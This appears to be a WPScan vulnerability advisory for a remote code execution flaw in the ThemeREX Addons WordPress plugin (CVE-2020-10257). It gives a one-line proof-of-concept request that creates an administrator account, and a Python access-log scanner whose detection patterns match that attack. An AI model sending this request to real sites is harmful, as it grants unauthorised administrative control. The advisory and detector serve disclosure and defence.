ThemeREX Addons - Remote Code Execution



Description
"This flaw allows attackers to remotely execute code on a site with the plugin installed, including the ability to execute code that can inject administrative user accounts."

Note (WPScanTeam): There are major version inconsistencies in the trx_addons plugin shipped with the affected themes. As a result, a common "fixed in" version cannot be set yet; see the posts from ThemeREX and Wordfence in the references below for the patched versions per theme.
Proof of Concept
https://[domain]/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=admin&user_pass=admin
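The request above reaches the plugin's public REST endpoint and names a WordPress core function in the `sc` parameter instead of a shortcode. A site owner can look for that pattern in web server access logs. The following is an added detection example, not code from WPScan, Wordfence or ThemeREX: it parses constructed combined-format log lines, matches the `trx_addons/<version>/get/sc_layout` route case-insensitively (the PoC uses `V2`), and grades each hit. The set of user-management function names and the `wp_` prefix heuristic are assumptions for the example, not a list published by the vendor.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache/nginx combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Feb/2020:10:01:02 +0000] "GET /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=attacker&user_pass=p%40ss HTTP/1.1" 200 512 "-" "curl/7.68.0"
198.51.100.4 - - [18/Feb/2020:10:01:05 +0000] "GET /wp-json/trx_addons/v2/get/sc_layout?sc=trx_sc_blogger&type=default HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Feb/2020:10:02:11 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.8 - - [18/Feb/2020:10:03:40 +0000] "GET /wp-json/trx_addons/V2/get/sc_layout?sc=wp_nav_menu HTTP/1.1" 500 0 "-" "python-requests/2.22"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The plugin's REST route; version segment and case are matched loosely on purpose.
ENDPOINT_RE = re.compile(r'^/wp-json/trx_addons/v\d+/get/sc_layout$', re.IGNORECASE)

# Assumption: core WordPress user-management functions that a "shortcode" name
# should never resolve to. Any of these in `sc` is treated as an attack attempt.
USER_FUNCS = {"wp_insert_user", "wp_create_user", "wp_update_user", "wp_set_current_user"}


def classify(target):
    """Return (severity, sc) for a request target, or (None, None) if it is not the endpoint.

    high   - sc names a user-management function, or role=administrator is supplied
    review - sc looks like a core function (wp_ prefix) rather than a plugin shortcode
    info   - endpoint reached with an ordinary-looking shortcode name
    """
    parts = urlsplit(target)
    if not ENDPOINT_RE.match(parts.path):
        return None, None
    qs = parse_qs(parts.query)
    sc = qs.get("sc", [""])[0]
    role = qs.get("role", [""])[0]
    if sc in USER_FUNCS or role == "administrator":
        return "high", sc
    if sc.startswith("wp_"):
        return "review", sc
    return "info", sc


def scan(log_text):
    """Parse log lines and return a finding dict for every request to the endpoint."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        severity, sc = classify(m["target"])
        if severity is None:
            continue
        findings.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "status": int(m["status"]),
            "sc": sc,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['ts']} sc={f['sc']} status={f['status']}")
```

A `high` finding with a 200 status is the case to act on: check `wp_users` for accounts created at that timestamp and rotate credentials, since the PoC's parameters are exactly those of an account-creation call. `review` hits on a 500 status still indicate someone probing the endpoint.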

Affects Plugin

ThemeREX Addons (trx_addons)

Fixed in

no known fix

References

CVE 2020-10257
URL https://www.wordfence.com/blog/2020/02/zero-day-vulnerability-in-themerex-addons-plugin-exploited-in-the-wild
URL https://themerex.net/wp/themerex-addons-vulnerability-fixed/
URL https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Wordfence
Submitter Website https://wordfence.com
Submitter Twitter wordfence
Views 4500
Verified No
WPVDB ID 10076

Timeline

Publicly Published 2020-02-18
Added 2020-02-18
Last Updated 2020-03-12
